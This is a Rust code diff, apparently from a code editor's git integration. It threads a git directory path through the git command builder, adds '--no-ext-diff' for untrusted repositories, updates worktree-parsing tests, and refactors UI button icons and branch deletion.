if !paths.is_empty() {
let git = git_binary?;
let output = git
- .build_command(["update-index", "--add", "--remove", "--"])
+ .build_command(&["update-index", "--add", "--remove", "--"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_unix_str()))
.output()
@@ -2064,7 +1991,7 @@ impl GitRepository for RealGitRepository {
if !paths.is_empty() {
let git = git_binary?;
let output = git
- .build_command(["reset", "--quiet", "--"])
+ .build_command(&["reset", "--quiet", "--"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_std_path()))
.output()
@@ -2091,7 +2018,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["stash", "push", "--quiet", "--include-untracked"])
+ .build_command(&["stash", "push", "--quiet", "--include-untracked"])
.envs(env.iter())
.args(paths.iter().map(|p| p.as_unix_str()))
.output()
@@ -2196,7 +2123,7 @@ impl GitRepository for RealGitRepository {
// which we want to block on.
async move {
let git = git_binary?;
- let mut cmd = git.build_command(["commit", "--quiet", "-m"]);
+ let mut cmd = git.build_command(&["commit", "--quiet", "-m"]);
cmd.envs(env.iter())
.arg(&message.to_string())
.arg("--cleanup=strip")
@@ -2234,6 +2161,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let executor = cx.background_executor().clone();
let git_binary_path = self.system_git_binary_path.clone();
let is_trusted = self.is_trusted();
@@ -2245,10 +2173,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["push"]);
+ let mut command = git.build_command(&["push"]);
command
.envs(env.iter())
.args(options.map(|option| match option {
@@ -2276,6 +2205,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let executor = cx.background_executor().clone();
let git_binary_path = self.system_git_binary_path.clone();
let is_trusted = self.is_trusted();
@@ -2287,10 +2217,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["pull"]);
+ let mut command = git.build_command(&["pull"]);
command.envs(env.iter());
if rebase {
@@ -2316,6 +2247,7 @@ impl GitRepository for RealGitRepository {
cx: AsyncApp,
) -> BoxFuture<'_, Result<RemoteCommandOutput>> {
let working_directory = self.working_directory();
+ let git_directory = self.path();
let remote_name = format!("{}", fetch_options);
let git_binary_path = self.system_git_binary_path.clone();
let executor = cx.background_executor().clone();
@@ -2328,10 +2260,11 @@ impl GitRepository for RealGitRepository {
let git = GitBinary::new(
git_binary_path,
working_directory,
+ git_directory,
executor.clone(),
is_trusted,
);
- let mut command = git.build_command(["fetch", &remote_name]);
+ let mut command = git.build_command(&["fetch", &remote_name]);
command
.envs(env.iter())
.stdout(Stdio::piped())
@@ -2348,7 +2281,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["rev-parse", "--abbrev-ref"])
+ .build_command(&["rev-parse", "--abbrev-ref"])
.arg(format!("{branch}@{{push}}"))
.output()
.await?;
@@ -2373,7 +2306,7 @@ impl GitRepository for RealGitRepository {
.spawn(async move {
let git = git_binary?;
let output = git
- .build_command(["config", "--get"])
+ .build_command(&["config", "--get"])
.arg(format!("branch.{branch}.remote"))
.output()
.await?;
@@ -2394,7 +2327,7 @@ impl GitRepository for RealGitRepository {
self.executor
.spawn(async move {
let git = git_binary?;
- let output = git.build_command(["remote", "-v"]).output().await?;
+ let output = git.build_command(&["remote", "-v"]).output().await?;
anyhow::ensure!(
output.status.success(),
@@ -2725,7 +2658,7 @@ impl GitRepository for RealGitRepository {
async move {
let git = git_binary?;
- let mut command = git.build_command([
+ let mut command = git.build_command(&[
"log",
GRAPH_COMMIT_FORMAT,
log_order.as_arg(),
@@ -2808,7 +2741,7 @@ async fn run_commit_data_reader(
request_rx: smol::channel::Receiver<CommitDataRequest>,
) -> Result<()> {
let mut process = git
- .build_command(["--no-optional-locks", "cat-file", "--batch"])
+ .build_command(&["--no-optional-locks", "cat-file", "--batch"])
.stdin(Stdio::piped())
.stdout(Stdio::piped())
.stderr(Stdio::piped())
@@ -2980,6 +2913,7 @@ async fn exclude_files(git: &GitBinary) -> Result<GitExcludeOverride> {
pub(crate) struct GitBinary {
git_binary_path: PathBuf,
working_directory: PathBuf,
+ git_directory: PathBuf,
executor: BackgroundExecutor,
index_file_path: Option<PathBuf>,
envs: HashMap<String, String>,
@@ -2990,12 +2924,14 @@ impl GitBinary {
pub(crate) fn new(
git_binary_path: PathBuf,
working_directory: PathBuf,
+ git_directory: PathBuf,
executor: BackgroundExecutor,
is_trusted: bool,
) -> Self {
Self {
git_binary_path,
working_directory,
+ git_directory,
executor,
index_file_path: None,
envs: HashMap::default(),
@@ -3041,12 +2977,9 @@ impl GitBinary {
// Copy the default index file so that Git doesn't have to rebuild the
// whole index from scratch. This might fail if this is an empty repository.
- smol::fs::copy(
- self.working_directory.join(".git").join("index"),
- &index_file_path,
- )
- .await
- .ok();
+ smol::fs::copy(self.git_directory.join("index"), &index_file_path)
+ .await
+ .ok();
self.index_file_path = Some(index_file_path.clone());
let result = f(self).await;
@@ -3060,22 +2993,16 @@ impl GitBinary {
}
pub async fn with_exclude_overrides(&self) -> Result<GitExcludeOverride> {
- let path = self
- .working_directory
- .join(".git")
- .join("info")
- .join("exclude");
+ let path = self.git_directory.join("info").join("exclude");
GitExcludeOverride::new(path).await
}
fn path_for_index_id(&self, id: Uuid) -> PathBuf {
- self.working_directory
- .join(".git")
- .join(format!("index-{}.tmp", id))
+ self.git_directory.join(format!("index-{}.tmp", id))
}
- pub async fn run<S>(&self, args: impl IntoIterator<Item = S>) -> Result<String>
+ pub async fn run<S>(&self, args: &[S]) -> Result<String>
where
S: AsRef<OsStr>,
{
@@ -3087,7 +3014,7 @@ impl GitBinary {
}
/// Returns the result of the command without trimming the trailing newline.
- pub async fn run_raw<S>(&self, args: impl IntoIterator<Item = S>) -> Result<String>
+ pub async fn run_raw<S>(&self, args: &[S]) -> Result<String>
where
S: AsRef<OsStr>,
{
@@ -3105,10 +3032,7 @@ impl GitBinary {
}
#[allow(clippy::disallowed_methods)]
- pub(crate) fn build_command<S>(
- &self,
- args: impl IntoIterator<Item = S>,
- ) -> util::command::Command
+ pub(crate) fn build_command<S>(&self, args: &[S]) -> util::command::Command
where
S: AsRef<OsStr>,
{
@@ -3125,6 +3049,14 @@ impl GitBinary {
command.args(["-c", "diff.external="]);
}
command.args(args);
+
+ // If the `diff` command is being used, we'll want to add the
+ // `--no-ext-diff` flag when working on an untrusted repository,
+ // preventing any external diff programs from being invoked.
+ if !self.is_trusted && args.iter().any(|arg| arg.as_ref() == "diff") {
+ command.arg("--no-ext-diff");
+ }
+
if let Some(index_file_path) = self.index_file_path.as_ref() {
command.env("GIT_INDEX_FILE", index_file_path);
}
@@ -3373,6 +3305,8 @@ fn checkpoint_author_envs() -> HashMap<String, String> {
#[cfg(test)]
mod tests {
+ use std::fs;
+
use super::*;
use gpui::TestAppContext;
@@ -3390,11 +3324,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["version"])
+ .build_command(&["version"])
.output()
.await
.expect("git version should succeed");
@@ -3403,11 +3338,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["config", "--get", "core.fsmonitor"])
+ .build_command(&["config", "--get", "core.fsmonitor"])
.output()
.await
.expect("git config should run");
@@ -3422,11 +3358,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
false,
);
let output = git
- .build_command(["config", "--get", "core.hooksPath"])
+ .build_command(&["config", "--get", "core.hooksPath"])
.output()
.await
.expect("git config should run");
@@ -3447,11 +3384,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
true,
);
let output = git
- .build_command(["config", "--get", "core.fsmonitor"])
+ .build_command(&["config", "--get", "core.fsmonitor"])
.output()
.await
.expect("git config should run");
@@ -3465,11 +3403,12 @@ mod tests {
let git = GitBinary::new(
PathBuf::from("git"),
dir.path().to_path_buf(),
+ dir.path().join(".git"),
cx.executor(),
true,
);
let output = git
- .build_command(["config", "--get", "core.hooksPath"])
+ .build_command(&["config", "--get", "core.hooksPath"])
.output()
.await
.expect("git config should run");
@@ -3479,6 +3418,27 @@ mod tests {
);
}
+ #[gpui::test]
+ async fn test_path_for_index_id_uses_real_git_directory(cx: &mut TestAppContext) {
+ cx.executor().allow_parking();
+ let working_directory = PathBuf::from("/code/worktree");
+ let git_directory = PathBuf::from("/code/repo/.git/modules/worktree");
+ let git = GitBinary::new(
+ PathBuf::from("git"),
+ working_directory,
+ git_directory.clone(),
+ cx.executor(),
+ false,
+ );
+
+ let path = git.path_for_index_id(Uuid::nil());
+
+ assert_eq!(
+ path,
+ git_directory.join(format!("index-{}.tmp", Uuid::nil()))
+ );
+ }
+
#[gpui::test]
async fn test_checkpoint_basic(cx: &mut TestAppContext) {
disable_git_global_config();
@@ -3838,7 +3798,7 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123def");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
// Multiple worktrees
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
@@ -3846,23 +3806,30 @@ mod tests {
let result = parse_worktrees_from_str(input);
assert_eq!(result.len(), 2);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
assert_eq!(result[1].path, PathBuf::from("/home/user/project-wt"));
- assert_eq!(result[1].ref_name.as_ref(), "refs/heads/feature");
+ assert_eq!(result[1].ref_name, Some("refs/heads/feature".into()));
- // Detached HEAD entry (should be skipped since ref_name won't parse)
+ // Detached HEAD entry (included with ref_name: None)
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
worktree /home/user/detached\nHEAD def456\ndetached\n\n";
let result = parse_worktrees_from_str(input);
- assert_eq!(result.len(), 1);
+ assert_eq!(result.len(), 2);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
+ assert_eq!(result[1].path, PathBuf::from("/home/user/detached"));
+ assert_eq!(result[1].ref_name, None);
+ assert_eq!(result[1].sha.as_ref(), "def456");
- // Bare repo entry (should be skipped)
+ // Bare repo entry (included with ref_name: None)
let input = "worktree /home/user/bare.git\nHEAD abc123\nbare\n\n\
worktree /home/user/project\nHEAD def456\nbranch refs/heads/main\n\n";
let result = parse_worktrees_from_str(input);
- assert_eq!(result.len(), 1);
- assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result.len(), 2);
+ assert_eq!(result[0].path, PathBuf::from("/home/user/bare.git"));
+ assert_eq!(result[0].ref_name, None);
+ assert_eq!(result[1].path, PathBuf::from("/home/user/project"));
+ assert_eq!(result[1].ref_name, Some("refs/heads/main".into()));
// Extra porcelain lines (locked, prunable) should be ignored
let input = "worktree /home/user/project\nHEAD abc123\nbranch refs/heads/main\n\n\
@@ -3871,11 +3838,14 @@ mod tests {
let result = parse_worktrees_from_str(input);
assert_eq!(result.len(), 3);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
assert_eq!(result[1].path, PathBuf::from("/home/user/locked-wt"));
- assert_eq!(result[1].ref_name.as_ref(), "refs/heads/locked-branch");
+ assert_eq!(result[1].ref_name, Some("refs/heads/locked-branch".into()));
assert_eq!(result[2].path, PathBuf::from("/home/user/prunable-wt"));
- assert_eq!(result[2].ref_name.as_ref(), "refs/heads/prunable-branch");
+ assert_eq!(
+ result[2].ref_name,
+ Some("refs/heads/prunable-branch".into())
+ );
// Leading/trailing whitespace on lines should be tolerated
let input =
@@ -3884,7 +3854,7 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
// Windows-style line endings should be handled
let input = "worktree /home/user/project\r\nHEAD abc123\r\nbranch refs/heads/main\r\n\r\n";
@@ -3892,89 +3862,79 @@ mod tests {
assert_eq!(result.len(), 1);
assert_eq!(result[0].path, PathBuf::from("/home/user/project"));
assert_eq!(result[0].sha.as_ref(), "abc123");
- assert_eq!(result[0].ref_name.as_ref(), "refs/heads/main");
+ assert_eq!(result[0].ref_name, Some("refs/heads/main".into()));
}
- const TEST_WORKTREE_DIRECTORIES: &[&str] =
- &["../worktrees", ".git/zed-worktrees", "my-worktrees/"];
-
#[gpui::test]
async fn test_create_and_list_worktrees(cx: &mut TestAppContext) {
disable_git_global_config();
cx.executor().allow_parking();
- for worktree_dir_setting in TEST_WORKTREE_DIRECTORIES {
- let repo_dir = tempfile::tempdir().unwrap();
- git2::Repository::init(repo_dir.path()).unwrap();
+ let temp_dir = tempfile::tempdir().unwrap();
+ let repo_dir = temp_dir.path().join("repo");
+ let worktrees_dir = temp_dir.path().join("worktrees");
- let repo = RealGitRepository::new(
- &repo_dir.path().join(".git"),
- None,
- Some("git".into()),
- cx.executor(),
- )
- .unwrap();
+ fs::create_dir_all(&repo_dir).unwrap();
+ fs::create_dir_all(&worktrees_dir).unwrap();
- // Create an initial commit (required for worktrees)
- smol::fs::write(repo_dir.path().join("file.txt"), "content")
- .await
- .unwrap();
- repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default()))
- .await
- .unwrap();
- repo.commit(
- "Initial commit".into(),
- None,
- CommitOptions::default(),
- AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}),
- Arc::new(checkpoint_author_envs()),
- )
- .await
- .unwrap();
+ git2::Repository::init(&repo_dir).unwrap();
- // List worktrees — should have just the main one
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 1);
- assert_eq!(
- worktrees[0].path.canonicalize().unwrap(),
- repo_dir.path().canonicalize().unwrap()
- );
+ let repo = RealGitRepository::new(
+ &repo_dir.join(".git"),
+ None,
+ Some("git".into()),
+ cx.executor(),
+ )
+ .unwrap();
- // Create a new worktree
- repo.create_worktree(
- "test-branch".to_string(),
- resolve_worktree_directory(repo_dir.path(), worktree_dir_setting),
- Some("HEAD".to_string()),
- )
+ // Create an initial commit (required for worktrees)
+ smol::fs::write(repo_dir.join("file.txt"), "content")
.await
.unwrap();
+ repo.stage_paths(vec![repo_path("file.txt")], Arc::new(HashMap::default()))
+ .await
+ .unwrap();
+ repo.commit(
+ "Initial commit".into(),
+ None,
+ CommitOptions::default(),
+ AskPassDelegate::new(&mut cx.to_async(), |_, _, _| {}),
+ Arc::new(checkpoint_author_envs()),
+ )
+ .await
+ .unwrap();
- // List worktrees — should have two
- let worktrees = repo.worktrees().await.unwrap();
- assert_eq!(worktrees.len(), 2);
-
- let expected_path =
- worktree_path_for_branch(repo_dir.path(), worktree_dir_setting, "test-branch");
- let new_worktree = worktrees
- .iter()
- .find(|w| w.branch() == "test-branch")
- .expect("should find worktree with test-branch");
- assert_eq!(
- new_worktree.path.canonicalize().unwrap(),
- expected_path.canonicalize().unwrap(),
- "failed for worktree_directory setting: {worktree_dir_setting:?}"
- );
+ // List worktrees — should have just the main one
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 1);
+ assert_eq!(
+ worktrees[0].path.canonicalize().unwrap(),
+ repo_dir.canonicalize().unwrap()
+ );
- // Clean up so the next iteration starts fresh
- repo.remove_worktree(expected_path, true).await.unwrap();
+ let worktree_path = worktrees_dir.join("some-worktree");
- // Clean up the worktree base directory if it was created outside repo_dir
- // (e.g. for the "../worktrees" setting, it won't be inside the TempDir)
- let resolved_dir = resolve_worktree_directory(repo_dir.path(), worktree_dir_setting);
- if !resolved_dir.starts_with(repo_dir.path()) {
- let _ = std::fs::remove_dir_all(&resolved_dir);
- }
- }
+ // Create a new worktree
+ repo.create_worktree(
+ "test-branch".to_string(),
+ worktree_path.clone(),
+ Some("HEAD".to_string()),
+ )
+ .await
+ .unwrap();
+
+ // List worktrees — should have two
+ let worktrees = repo.worktrees().await.unwrap();
+ assert_eq!(worktrees.len(), 2);
+
+ let new_worktree = worktrees
+ .iter()
+ .find(|w| w.display_name() == "test-branch")
+ .expect("should find worktree with test-branch");
+ assert_eq!(
+ new_worktree.path.canonicalize().unwrap(),
+ worktree_path.canonicalize().unwrap(),
+ );
}
#[gpui::test]
@@ -15,7 +15,7 @@ use gpui::{
px, uniform_list,
};
use language::line_diff;
-use menu::{Cancel, SelectNext, SelectPrevious};
+use menu::{Cancel, SelectFirst, SelectLast, SelectNext, SelectPrevious};
use project::{
Project,
git_store::{
@@ -1171,22 +1171,35 @@ impl GitGraph {
cx.notify();
}
- fn select_prev(&mut self, _: &SelectPrevious, _window: &mut Window, cx: &mut Context<Self>) {
+ fn select_first(&mut self, _: &SelectFirst, _window: &mut Window, cx: &mut Context<Self>) {
+ self.select_entry(0, cx);
+ }
+
+ fn select_prev(&mut self, _: &SelectPrevious, window: &mut Window, cx: &mut Context<Self>) {
if let Some(selected_entry_idx) = &self.selected_entry_idx {
self.select_entry(selected_entry_idx.saturating_sub(1), cx);
} else {
- self.select_entry(0, cx);
+ self.select_first(&SelectFirst, window, cx);
}
}
fn select_next(&mut self, _: &SelectNext, window: &mut Window, cx: &mut Context<Self>) {
if let Some(selected_entry_idx) = &self.selected_entry_idx {
- self.select_entry(selected_entry_idx.saturating_add(1), cx);
+ self.select_entry(
+ selected_entry_idx
+ .saturating_add(1)
+ .min(self.graph_data.commits.len().saturating_sub(1)),
+ cx,
+ );
} else {
self.select_prev(&SelectPrevious, window, cx);
}
}
+ fn select_last(&mut self, _: &SelectLast, _window: &mut Window, cx: &mut Context<Self>) {
+ self.select_entry(self.graph_data.commits.len().saturating_sub(1), cx);
+ }
+
fn confirm(&mut self, _: &menu::Confirm, window: &mut Window, cx: &mut Context<Self>) {
self.open_selected_commit_view(window, cx);
}
@@ -1481,10 +1494,9 @@ impl GitGraph {
this.child(
Button::new("author-email-copy", author_email.clone())
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(icon_color)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(icon_color),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -1529,10 +1541,9 @@ impl GitGraph {
};
Button::new("sha-button", &full_sha)
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(icon_color)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(icon_color),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -1589,10 +1600,9 @@ impl GitGraph {
"view-on-provider",
format!("View on {}", provider_name),
)
- .icon(icon)
- .icon_size(IconSize::Small)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(icon).size(IconSize::Small).color(Color::Muted),
+ )
.label_size(LabelSize::Small)
.truncate(true)
.color(Color::Muted)
@@ -2260,8 +2270,10 @@ impl Render for GitGraph {
this.open_selected_commit_view(window, cx);
}))
.on_action(cx.listener(Self::cancel))
+ .on_action(cx.listener(Self::select_first))
.on_action(cx.listener(Self::select_prev))
.on_action(cx.listener(Self::select_next))
+ .on_action(cx.listener(Self::select_last))
.on_action(cx.listener(Self::confirm))
.child(content)
.children(self.context_menu.as_ref().map(|(menu, position, _)| {
@@ -2346,7 +2358,7 @@ impl SerializableItem for GitGraph {
alive_items,
workspace_id,
"git_graphs",
- &persistence::GIT_GRAPHS,
+ &persistence::GitGraphsDb::global(cx),
cx,
)
}
@@ -2359,7 +2371,8 @@ impl SerializableItem for GitGraph {
window: &mut Window,
cx: &mut App,
) -> Task<gpui::Result<Entity<Self>>> {
- if persistence::GIT_GRAPHS
+ let db = persistence::GitGraphsDb::global(cx);
+ if db
.get_git_graph(item_id, workspace_id)
.ok()
.is_some_and(|is_open| is_open)
@@ -2380,11 +2393,12 @@ impl SerializableItem for GitGraph {
cx: &mut Context<Self>,
) -> Option<Task<gpui::Result<()>>> {
let workspace_id = workspace.database_id()?;
- Some(cx.background_spawn(async move {
- persistence::GIT_GRAPHS
- .save_git_graph(item_id, workspace_id, true)
- .await
- }))
+ let db = persistence::GitGraphsDb::global(cx);
+ Some(
+ cx.background_spawn(
+ async move { db.save_git_graph(item_id, workspace_id, true).await },
+ ),
+ )
}
fn should_serialize(&self, event: &Self::Event) -> bool {
@@ -2418,7 +2432,7 @@ mod persistence {
)]);
}
- db::static_connection!(GIT_GRAPHS, GitGraphsDb, [WorkspaceDb]);
+ db::static_connection!(GitGraphsDb, [WorkspaceDb]);
impl GitGraphsDb {
query! {
@@ -26,6 +26,7 @@ collections.workspace = true
component.workspace = true
db.workspace = true
editor.workspace = true
+file_icons.workspace = true
futures.workspace = true
feature_flags.workspace = true
fuzzy.workspace = true
@@ -322,10 +322,11 @@ impl BlameRenderer for GitBlameRenderer {
format!("#{}", pr.number),
)
.color(Color::Muted)
- .icon(IconName::PullRequest)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::PullRequest)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, _, cx| {
cx.stop_propagation();
cx.open_url(pr.url.as_str())
@@ -339,10 +340,11 @@ impl BlameRenderer for GitBlameRenderer {
short_commit_id.clone(),
)
.color(Color::Muted)
- .icon(IconName::FileGit)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
- .icon_size(IconSize::Small)
+ .start_icon(
+ Icon::new(IconName::FileGit)
+ .size(IconSize::Small)
+ .color(Color::Muted),
+ )
.on_click(move |_, window, cx| {
CommitView::open(
commit_summary.sha.clone().into(),
@@ -16,10 +16,7 @@ use project::project_settings::ProjectSettings;
use settings::Settings;
use std::sync::Arc;
use time::OffsetDateTime;
-use ui::{
- Divider, HighlightedLabel, KeyBinding, ListHeader, ListItem, ListItemSpacing, Tooltip,
- prelude::*,
-};
+use ui::{Divider, HighlightedLabel, KeyBinding, ListItem, ListItemSpacing, Tooltip, prelude::*};
use ui_input::ErasedEditor;
use util::ResultExt;
use workspace::notifications::DetachAndPromptErr;
@@ -486,28 +483,24 @@ impl BranchListDelegate {
let workspace = self.workspace.clone();
cx.spawn_in(window, async move |picker, cx| {
- let mut is_remote = false;
+ let is_remote;
let result = match &entry {
- Entry::Branch { branch, .. } => match branch.remote_name() {
- Some(remote_name) => {
- is_remote = true;
- repo.update(cx, |repo, _| repo.remove_remote(remote_name.to_string()))
- .await?
- }
- None => {
- repo.update(cx, |repo, _| repo.delete_branch(branch.name().to_string()))
- .await?
- }
- },
+ Entry::Branch { branch, .. } => {
+ is_remote = branch.is_remote();
+ repo.update(cx, |repo, _| {
+ repo.delete_branch(is_remote, branch.name().to_string())
+ })
+ .await?
+ }
_ => {
- log::error!("Failed to delete remote: wrong entry to delete");
+ log::error!("Failed to delete entry: wrong entry to delete");
return Ok(());
}
};
if let Err(e) = result {
if is_remote {
- log::error!("Failed to delete remote: {}", e);
+ log::error!("Failed to delete remote branch: {}", e);
} else {
log::error!("Failed to delete branch: {}", e);
}
@@ -517,7 +510,7 @@ impl BranchListDelegate {
if is_remote {
show_error_toast(
workspace,
- format!("remote remove {}", entry.name()),
+ format!("branch -dr {}", entry.name()),
e,
cx,
)
@@ -1088,21 +1081,6 @@ impl PickerDelegate for BranchListDelegate {
)
}
- fn render_header(
- &self,
- _window: &mut Window,
- _cx: &mut Context<Picker<Self>>,
- ) -> Option<AnyElement> {
- matches!(self.state, PickerState::List).then(|| {
- let label = match self.branch_filter {
- BranchFilter::All => "Branches",
- BranchFilter::Remote => "Remotes",
- };
-
- ListHeader::new(label).inset(true).into_any_element()
- })
- }
-
fn render_footer(&self, _: &mut Window, cx: &mut Context<Picker<Self>>) -> Option<AnyElement> {
if self.editor_position() == PickerEditorPosition::End {
return None;
@@ -1197,7 +1175,11 @@ impl PickerDelegate for BranchListDelegate {
this.justify_between()
.child({
let focus_handle = focus_handle.clone();
- Button::new("filter-remotes", "Filter Remotes")
+ let filter_label = match self.branch_filter {
+ BranchFilter::All => "Filter Remote",
+ BranchFilter::Remote => "Show All",
+ };
+ Button::new("filter-remotes", filter_label)
.toggle_state(matches!(
self.branch_filter,
BranchFilter::Remote
@@ -1513,6 +1495,30 @@ mod tests {
});
cx.run_until_parked();
+ let expected_branches = ["main", "feature-auth", "feature-ui", "develop"]
+ .into_iter()
+ .filter(|name| name != &branch_to_delete)
+ .collect::<HashSet<_>>();
+ let repo_branches = branch_list
+ .update(cx, |branch_list, cx| {
+ branch_list.picker.update(cx, |picker, cx| {
+ picker
+ .delegate
+ .repo
+ .as_ref()
+ .unwrap()
+ .update(cx, |repo, _cx| repo.branches())
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+ let repo_branches = repo_branches
+ .iter()
+ .map(|b| b.name())
+ .collect::<HashSet<_>>();
+ assert_eq!(&repo_branches, &expected_branches);
+
branch_list.update(cx, move |branch_list, cx| {
branch_list.picker.update(cx, move |picker, _cx| {
assert_eq!(picker.delegate.matches.len(), 3);
@@ -1522,19 +1528,13 @@ mod tests {
.iter()
.map(|be| be.name())
.collect::<HashSet<_>>();
- assert_eq!(
- branches,
- ["main", "feature-auth", "feature-ui", "develop"]
- .into_iter()
- .filter(|name| name != &branch_to_delete)
- .collect::<HashSet<_>>()
- );
+ assert_eq!(branches, expected_branches);
})
});
}
#[gpui::test]
- async fn test_delete_remote(cx: &mut TestAppContext) {
+ async fn test_delete_remote_branch(cx: &mut TestAppContext) {
init_test(cx);
let (_project, repository) = init_fake_repository(cx).await;
let branches = vec![
@@ -1544,19 +1544,17 @@ mod tests {
create_test_branch("develop", false, Some("private"), Some(700)),
];
- let remote_names = branches
+ let branch_names = branches
.iter()
- .filter_map(|branch| branch.remote_name().map(|r| r.to_string()))
+ .map(|branch| branch.name().to_string())
.collect::<Vec<String>>();
let repo = repository.clone();
cx.spawn(async move |mut cx| {
- for branch in remote_names {
- repo.update(&mut cx, |repo, _| {
- repo.create_remote(branch, String::from("test"))
- })
- .await
- .unwrap()
- .unwrap();
+ for branch in branch_names {
+ repo.update(&mut cx, |repo, _| repo.create_branch(branch, None))
+ .await
+ .unwrap()
+ .unwrap();
}
})
.await;
@@ -1583,6 +1581,35 @@ mod tests {
});
cx.run_until_parked();
+ let expected_branches = [
+ "origin/main",
+ "origin/feature-auth",
+ "fork/feature-ui",
+ "private/develop",
+ ]
+ .into_iter()
+ .filter(|name| name != &branch_to_delete)
+ .collect::<HashSet<_>>();
+ let repo_branches = branch_list
+ .update(cx, |branch_list, cx| {
+ branch_list.picker.update(cx, |picker, cx| {
+ picker
+ .delegate
+ .repo
+ .as_ref()
+ .unwrap()
+ .update(cx, |repo, _cx| repo.branches())
+ })
+ })
+ .await
+ .unwrap()
+ .unwrap();
+ let repo_branches = repo_branches
+ .iter()
+ .map(|b| b.name())
+ .collect::<HashSet<_>>();
+ assert_eq!(&repo_branches, &expected_branches);
+
// Check matches, it should match one less branch than before
branch_list.update(cx, move |branch_list, cx| {
branch_list.picker.update(cx, move |picker, _cx| {
@@ -1593,18 +1620,7 @@ mod tests {
.iter()
.map(|be| be.name())
.collect::<HashSet<_>>();
- assert_eq!(
- branches,
- [
- "origin/main",
- "origin/feature-auth",
- "fork/feature-ui",
- "private/develop"
- ]
- .into_iter()
- .filter(|name| name != &branch_to_delete)
- .collect::<HashSet<_>>()
- );
+ assert_eq!(branches, expected_branches);
})
});
}
@@ -366,11 +366,12 @@ impl CommitModal {
.unwrap_or_else(|| "<no branch>".to_owned());
let branch_picker_button = panel_button(branch)
- .icon(IconName::GitBranch)
- .icon_size(IconSize::Small)
- .icon_color(Color::Placeholder)
+ .start_icon(
+ Icon::new(IconName::GitBranch)
+ .size(IconSize::Small)
+ .color(Color::Placeholder),
+ )
.color(Color::Muted)
- .icon_position(IconPosition::Start)
.on_click(cx.listener(|_, _, window, cx| {
window.dispatch_action(zed_actions::git::Branch.boxed_clone(), cx);
}))
@@ -336,9 +336,10 @@ impl Render for CommitTooltip {
format!("#{}", pr.number),
)
.color(Color::Muted)
- .icon(IconName::PullRequest)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::PullRequest)
+ .color(Color::Muted),
+ )
.style(ButtonStyle::Subtle)
.on_click(move |_, _, cx| {
cx.stop_propagation();
@@ -354,9 +355,9 @@ impl Render for CommitTooltip {
)
.style(ButtonStyle::Subtle)
.color(Color::Muted)
- .icon(IconName::FileGit)
- .icon_color(Color::Muted)
- .icon_position(IconPosition::Start)
+ .start_icon(
+ Icon::new(IconName::FileGit).color(Color::Muted),
+ )
